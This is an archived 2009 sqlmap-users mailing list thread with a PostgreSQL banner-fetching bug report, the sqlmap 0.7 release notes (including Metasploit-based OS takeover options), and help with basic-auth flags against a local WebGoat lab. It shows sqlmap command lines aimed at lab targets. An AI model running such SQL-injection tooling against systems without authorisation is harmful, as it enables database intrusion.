> Here is the backtrace:
>
> sqlmap version: 0.7
> Python version: 2.5.4
> Operating system: linux2
> Traceback (most recent call last):
>  File "./sqlmap.py", line 84, in main
>    start()
>  File "/home/sven/diplom/sqlmap/lib/controller/controller.py", line
> 263, in start
>    action()
>  File "/home/sven/diplom/sqlmap/lib/controller/action.py", line 49,
> in action
>    conf.dbmsHandler = setHandler()
>  File "/home/sven/diplom/sqlmap/lib/controller/handler.py", line 67,
> in setHandler
>    if dbmsHandler.checkDbms():
>  File "/home/sven/diplom/sqlmap/plugins/dbms/postgresql.py", line
> 203, in checkDbms
>    self.getBanner()
>  File "/home/sven/diplom/sqlmap/plugins/generic/enumeration.py", line
> 130, in getBanner
>    setOs()
>  File "/home/sven/diplom/sqlmap/lib/core/session.py", line 191, in setOs
>    infoMsg += " Service Pack %d" % kb.osSP
> TypeError: int argument required
>
> Cheers,
> Sven
>
> - --
> Sven Klemm
> http://cthulhu.c3d2.de/~sven/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
>
> iEYEARECAAYFAkpwFWoACgkQevlgTHEIT4YQuQCfW6nT0qnvAb1eubNQ8SvXLhlz
> O/0AnRa5TO9aATy9hnhpt6Y8Lw4T7fDd
> =ErDL
> -----END PGP SIGNATURE-----
>
> ------------------------------------------------------------------------------
> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
> trial. Simplify your report design, integration and deployment - and focus on
> what you do best, core application coding. Discover what's new with
> Crystal Reports now.  http://p.sf.net/sfu/bobj-july
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

[sqlmap-users] Exception when fetching banner on PostgreSQL

[Sven K. <sv...@c3...>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I'm getting an exception when running the following command:

./sqlmap.py -u 'http://10.2.0.100/pg.php?user=sven' -b

The backend database is PostgreSQL 8.3.7 and I'm running sqlmap from SVN.

Here is the backtrace:

sqlmap version: 0.7
Python version: 2.5.4
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/sven/diplom/sqlmap/lib/controller/controller.py", line
263, in start
    action()
  File "/home/sven/diplom/sqlmap/lib/controller/action.py", line 49,
in action
    conf.dbmsHandler = setHandler()
  File "/home/sven/diplom/sqlmap/lib/controller/handler.py", line 67,
in setHandler
    if dbmsHandler.checkDbms():
  File "/home/sven/diplom/sqlmap/plugins/dbms/postgresql.py", line
203, in checkDbms
    self.getBanner()
  File "/home/sven/diplom/sqlmap/plugins/generic/enumeration.py", line
130, in getBanner
    setOs()
  File "/home/sven/diplom/sqlmap/lib/core/session.py", line 191, in setOs
    infoMsg += " Service Pack %d" % kb.osSP
TypeError: int argument required

Cheers,
Sven

- --
Sven Klemm
http://cthulhu.c3d2.de/~sven/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpwFWoACgkQevlgTHEIT4YQuQCfW6nT0qnvAb1eubNQ8SvXLhlz
O/0AnRa5TO9aATy9hnhpt6Y8Lw4T7fDd
=ErDL
-----END PGP SIGNATURE-----

[sqlmap-users] Database enumeration for PostgreSQL shows schemas instead of databases

[Sven K. <sv...@c3...>]

Hi,

When runnning sqlmap --dbs on a PostgreSQL backend sqlmap lists all
the schemas of the current database instead of the names of all
databases.
I've attached a patch that fixes the problem.


Cheers,
Sven

-- 
Sven Klemm
http://cthulhu.c3d2.de/~sven/

[sqlmap-users] sqlmap 0.7 released

[Bernardo D. A. G. <ber...@gm...>]

Hi,

I am glad to release sqlmap version 0.7.

Thanks to anyone of you that contributed with really appreciated and
useful feedback.

Changes
=======

Along all the takeover features introduced in sqlmap 0.7 release
candidate 1, some of the new features include:

* Adapted Metasploit wrapping functions to work with latest 3.3
development version too.
* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
--os-bof is selected) when running under Windows because msfconsole
and msfcli are not supported on the native Windows Ruby interpreter.
This make sqlmap 0.7 to work again on Windows too.
* Minor improvement so that sqlmap tests also all parameters with no
value (eg. par=).
* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.


Download
========

You can download it in various formats:

* Source gzip compressed,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.7.tar.gz

* Source bzip2 compressed,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.7.tar.bz2

* Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.7.zip

* DEB binary package,
http://downloads.sourceforge.net/sqlmap/sqlmap_0.7-1_all.deb

* RPM binary package,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.7-1.noarch.rpm

* Portable executable for Windows that does not require the Python
interpreter to be installed on the operating system,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.7_exe.zip


Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf

* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/


Happy hacking!
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Cant get basic auth to work...

[Bernardo D. A. G. <ber...@gm...>]

Hi Mathew,

Could you please download the latest development version from svn
repository, then launch it with -v 3 option and provide me with the
whole log?
Your syntax is correct, maybe just " instead of '.

Thanks,
Bernardo


On Fri, Jul 17, 2009 at 22:06, Mathew
Rowley<mat...@ca...> wrote:
> Is there something im doing wrong? This is connecting to a local web server
> (run on a virtual machine)
>
> $  ./sqlmap.py -u
> 'http://192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200' --auth-type
> Basic --auth-cred 'guest:guest' -v 3
>
>     sqlmap/0.7rc1
>     by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 15:00:01
>
> [15:00:01] [DEBUG] initializing the configuration
> [15:00:01] [DEBUG] initializing the knowledge base
> [15:00:01] [DEBUG] cleaning up configuration parameters
> [15:00:01] [DEBUG] setting the HTTP timeout
> [15:00:01] [DEBUG] setting the HTTP method to GET
> [15:00:01] [DEBUG] setting the HTTP Authentication type and credentials
> [15:00:01] [DEBUG] creating HTTP requests opener object
> [15:00:01] [DEBUG] parsing XML queries file
> [15:00:01] [INFO] testing connection to the target url
> [15:00:01] [ERROR] not authorized, try to provide right HTTP authentication
> type and valid credentials
>
> [*] shutting down at: 15:00:01
> ...


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Cant get basic auth to work...

[Ryan D. <rya...@gm...>]

2009/7/17 Mathew Rowley <mat...@ca...>:
> Is there something im doing wrong? This is connecting to a local web server
> (run on a virtual machine)
>

Yes.

The command should be:
$  ./sqlmap.py --auth-type=BASIC --auth-cred=guest:guest -v 3 -u
'http://192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200'

> $  ./sqlmap.py -u
> 'http://192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200' --auth-type
> Basic --auth-cred 'guest:guest' -v 3
>
>     sqlmap/0.7rc1
>     by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 15:00:01
>
> [15:00:01] [DEBUG] initializing the configuration
> [15:00:01] [DEBUG] initializing the knowledge base
> [15:00:01] [DEBUG] cleaning up configuration parameters
> [15:00:01] [DEBUG] setting the HTTP timeout
> [15:00:01] [DEBUG] setting the HTTP method to GET
> [15:00:01] [DEBUG] setting the HTTP Authentication type and credentials
> [15:00:01] [DEBUG] creating HTTP requests opener object
> [15:00:01] [DEBUG] parsing XML queries file
> [15:00:01] [INFO] testing connection to the target url
> [15:00:01] [ERROR] not authorized, try to provide right HTTP authentication
> type and valid credentials
>
> [*] shutting down at: 15:00:01
>
>
> Wget works fine:
> $ wget
> http://guest:guest@192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200
> [1] 38059
> atlantis:/Applications/hacking/sqlmap-0.7rc1 $ --2009-07-17 15:02:03--
>  http://guest:*password*@192.168.107.3:8180/WebGoat/attack?Screen=27
> Connecting to 192.168.107.3:8180... connected.
> HTTP request sent, awaiting response... 401 Unauthorized
> Reusing existing connection to 192.168.107.3:8180.
> HTTP request sent, awaiting response... 200 OK
> Length: 3914 (3.8K) [text/html]
> Saving to: `attack?Screen=27'
>
> 100%[====================================================================================================================================================================================================>]
> 3,914       --.-K/s   in 0s
>
> 2009-07-17 15:02:03 (149 MB/s) - `attack?Screen=27' saved [3914/3914]
>
> ------------------------------------------------------------------------------
> Enter the BlackBerry Developer Challenge
> This is your chance to win up to $100,000 in prizes! For a limited time,
> vendors submitting new applications to BlackBerry App World(TM) will have
> the opportunity to enter the BlackBerry Developer Challenge. See full prize
> details at: http://p.sf.net/sfu/Challenge
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>